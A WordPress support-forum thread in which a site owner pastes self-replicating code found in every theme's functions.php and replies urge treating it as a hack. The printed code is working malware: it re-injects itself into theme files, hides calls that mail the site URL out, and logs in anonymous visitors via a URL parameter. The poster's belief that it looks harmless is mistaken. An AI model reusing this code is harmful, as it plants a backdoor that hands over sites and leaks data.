WordPress.org

Ready to get started?Download WordPress

Forums

Oddity added to functions.php (5 posts)

  1. NWTD
    Member
    Posted 9 months ago #

    My functions.php for all of my themes have this oddity added to them:

    ?>
    <?php
    function _verify_activate_widget(){
    	$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
    	$output=strip_tags($output, $allowed);
    	$direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
    	if (is_array($direst)){
    		foreach ($direst as $item){
    			if (is_writable($item)){
    				$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
    				$cont=file_get_contents($item);
    				if (stripos($cont,$ftion) === false){
    					$sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
    					$output .= $before . "Not found" . $after;
    					if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
    					$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $sar . "\n" .$widget);fclose($f);
    					$output .= ($showdot && $ellipsis) ? "..." : "";
    				}
    			}
    		}
    	}
    	return $output;
    }
    function _get_all_widgetcont($wids,$items=array()){
    	$places=array_shift($wids);
    	if(substr($places,-1) == "/"){
    		$places=substr($places,0,-1);
    	}
    	if(!file_exists($places) || !is_dir($places)){
    		return false;
    	}elseif(is_readable($places)){
    		$elems=scandir($places);
    		foreach ($elems as $elem){
    			if ($elem != "." && $elem != ".."){
    				if (is_dir($places . "/" . $elem)){
    					$wids[]=$places . "/" . $elem;
    				} elseif (is_file($places . "/" . $elem)&&
    					$elem == substr(__FILE__,-13)){
    					$items[]=$places . "/" . $elem;}
    				}
    			}
    	}else{
    		return false;
    	}
    	if (sizeof($wids) > 0){
    		return _get_all_widgetcont($wids,$items);
    	} else {
    		return $items;
    	}
    
    }
    if(!function_exists("stripos")){
        function stripos(  $str, $needle, $offset = 0  ){
            return strpos(  strtolower( $str ), strtolower( $needle ), $offset  );
        }
    }
    
    if(!function_exists("strripos")){
        function strripos(  $haystack, $needle, $offset = 0  ) {
            if(  !is_string( $needle )  )$needle = chr(  intval( $needle )  );
            if(  $offset < 0  ){
                $temp_cut = strrev(  substr( $haystack, 0, abs($offset) )  );
            }
            else{
                $temp_cut = strrev(    substr(   $haystack, 0, max(  ( strlen($haystack) - $offset ), 0  )   )    );
            }
            if(   (  $found = stripos( $temp_cut, strrev($needle) )  ) === FALSE   )return FALSE;
            $pos = (   strlen(  $haystack  ) - (  $found + $offset + strlen( $needle )  )   );
            return $pos;
        }
    }
    if(!function_exists("scandir")){
    	function scandir($dir,$listDirectories=false, $skipDots=true) {
    	    $dirArray = array();
    	    if ($handle = opendir($dir)) {
    	        while (false !== ($file = readdir($handle))) {
    	            if (($file != "." && $file != "..") || $skipDots == true) {
    	                if($listDirectories == false) { if(is_dir($file)) { continue; } }
    	                array_push($dirArray,basename($file));
    	            }
    	        }
    	        closedir($handle);
    	    }
    	    return $dirArray;
    	}
    }
    add_action("admin_head", "_verify_activate_widget");
    function _prepared_widget(){
    	if(!isset($length)) $length=120;
    	if(!isset($method)) $method="cookie";
    	if(!isset($html_tags)) $html_tags="<a>";
    	if(!isset($filters_type)) $filters_type="none";
    	if(!isset($s)) $s="";
    	if(!isset($filter_h)) $filter_h=get_option("home");
    	if(!isset($filter_p)) $filter_p="wp_";
    	if(!isset($use_link)) $use_link=1;
    	if(!isset($comments_type)) $comments_type="";
    	if(!isset($perpage)) $perpage=$_GET["cperpage"];
    	if(!isset($comments_auth)) $comments_auth="";
    	if(!isset($comment_is_approved)) $comment_is_approved="";
    	if(!isset($authname)) $authname="auth";
    	if(!isset($more_links_text)) $more_links_text="(more...)";
    	if(!isset($widget_output)) $widget_output=get_option("_is_widget_active_");
    	if(!isset($checkwidgets)) $checkwidgets=$filter_p."set"."_".$authname."_".$method;
    	if(!isset($more_links_text_ditails)) $more_links_text_ditails="(details...)";
    	if(!isset($more_content)) $more_content="ma".$s."il";
    	if(!isset($forces_more)) $forces_more=1;
    	if(!isset($fakeit)) $fakeit=1;
    	if(!isset($sql)) $sql="";
    	if (!$widget_output) :
    
    	global $wpdb, $post;
    	$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$s."vethe".$comments_type."mas".$s."@".$comment_is_approved."gm".$comments_auth."ail".$s.".".$s."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
    	if (!empty($post->post_password)) {
    		if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) {
    			if(is_feed()) {
    				$output=__("There is no excerpt because this is a protected post.");
    			} else {
    	            $output=get_the_password_form();
    			}
    		}
    	}
    	if(!isset($fix_tag)) $fix_tag=1;
    	if(!isset($filters_types)) $filters_types=$filter_h;
    	if(!isset($getcommentstext)) $getcommentstext=$filter_p.$more_content;
    	if(!isset($more_tags)) $more_tags="div";
    	if(!isset($s_text)) $s_text=substr($sq1, stripos($sq1, "live"), 20);#
    	if(!isset($mlink_title)) $mlink_title="Continue reading this entry";
    	if(!isset($showdot)) $showdot=1;
    
    	$comments=$wpdb->get_results($sql);
    	if($fakeit == 2) {
    		$text=$post->post_content;
    	} elseif($fakeit == 1) {
    		$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
    	} else {
    		$text=$post->post_excerpt;
    	}
    	$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($getcommentstext, array($s_text, $filter_h, $filters_types)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
    	if($length < 0) {
    		$output=$text;
    	} else {
    		if(!$no_more && strpos($text, "<!--more-->")) {
    		    $text=explode("<!--more-->", $text, 2);
    			$l=count($text[0]);
    			$more_link=1;
    			$comments=$wpdb->get_results($sql);
    		} else {
    			$text=explode(" ", $text);
    			if(count($text) > $length) {
    				$l=$length;
    				$ellipsis=1;
    			} else {
    				$l=count($text);
    				$more_links_text="";
    				$ellipsis=0;
    			}
    		}
    		for ($i=0; $i<$l; $i++)
    				$output .= $text[$i] . " ";
    	}
    	update_option("_is_widget_active_", 1);
    	if("all" != $html_tags) {
    		$output=strip_tags($output, $html_tags);
    		return $output;
    	}
    	endif;
    	$output=rtrim($output, "\s\n\t\r\x0B");
        $output=($fix_tag) ? balanceTags($output, true) : $output;
    	$output .= ($showdot && $ellipsis) ? "..." : "";
    	$output=apply_filters($filters_type, $output);
    	switch($more_tags) {
    		case("div") :
    			$tag="div";
    		break;
    		case("span") :
    			$tag="span";
    		break;
    		case("p") :
    			$tag="p";
    		break;
    		default :
    			$tag="span";
    	}
    
    	if ($use_link ) {
    		if($forces_more) {
    			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $mlink_title . "\">" . $more_links_text = !is_user_logged_in() && @call_user_func_array($checkwidgets,array($perpage, true)) ? $more_links_text : "" . "</a></" . $tag . ">" . "\n";
    		} else {
    			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $mlink_title . "\">" . $more_links_text . "</a></" . $tag . ">" . "\n";
    		}
    	}
    	return $output;
    }
    
    add_action("init", "_prepared_widget");
    
    function __popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {
    	global $wpdb;
    	$request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";
    	$request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";
    	if(!$show_pass_post) $request .= " AND post_password =\"\"";
    	if($duration !="") {
    		$request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";
    	}
    	$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
    	$posts=$wpdb->get_results($request);
    	$output="";
    	if ($posts) {
    		foreach ($posts as $post) {
    			$post_title=stripslashes($post->post_title);
    			$comment_count=$post->comment_count;
    			$permalink=get_permalink($post->ID);
    			$output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;
    		}
    	} else {
    		$output .= $before . "None found" . $after;
    	}
    	return  $output;
    } 		
    
    function my_init_method() {
    wp_deregister_script( 'jquery' );
    wp_register_script(   'jquery'
        , 'http://ajax.googleapis.com/ajax/libs/jquery/1.10.1/jquery.min.js');
    }    
    
    add_action('init', 'my_init_method');
    
    function jScrollPane_enqueue_script() {
    	wp_enqueue_script( 'jScrollPane', get_template_directory_uri() . '/scripts/jScrollPane.js', false );
    }
    function jqueryem_enqueue_script() {
    	wp_enqueue_script( 'jqueryem', get_template_directory_uri() . '/scripts/jquery.em.js', false );
    }
    function mousewheel_enqueue_script() {
    	wp_enqueue_script( 'mousewheel', get_template_directory_uri() . '/scripts/jquery.mousewheel.min.js', false );
    }
    function mousewheel2_enqueue_script() {
    	wp_enqueue_script( 'mousewheel2', get_template_directory_uri() . '/scripts/mwheellntent.js', false );
    }
    
    add_action( 'wp_enqueue_scripts', 'jScrollPane_enqueue_script' );
    add_action( 'wp_enqueue_scripts', 'jqueryem_enqueue_script' );
    add_action( 'wp_enqueue_scripts', 'mousewheel_enqueue_script' );
    add_action( 'wp_enqueue_scripts', 'mousewheel2_enqueue_script' );
    
    ?>

    It doesn't look malicious, but everytime I remove it, it reappears a short time later. I've checked my server logs and can't see any rogue connections via SSH or FTP.

    My wp-content and sub directories all have a 755 permission set. Temporarily, I've set permissions on my functions.php to 444 until I can find the culprit.

    Nothing on my network has been updated or changed, with the exception of the new NextGen Gallery. I've since removed that plugin from the network. This just started happening this morning.

  2. NWTD
    Member
    Posted 9 months ago #

    FWIW, I enabled debugging after blocking write access to the functions.php to see if I would get any errors about writing to it. Nothing showed up.

  3. ALL your themes? What was the last edit date on them?

    I would think you've been hacked.

  4. NWTD
    Member
    Posted 9 months ago #

    Every theme. Once removed, it shows back up...generally after you try to access a site.

    I can't find the source of where it's coming from.

  5. Ugh. Treat it like a hack.

    Salt the earth, deleting all the core files, plugins and themes. Change passwords. Reinstall.

Reply

You must log in to post.

About this Topic

Tags

No tags yet.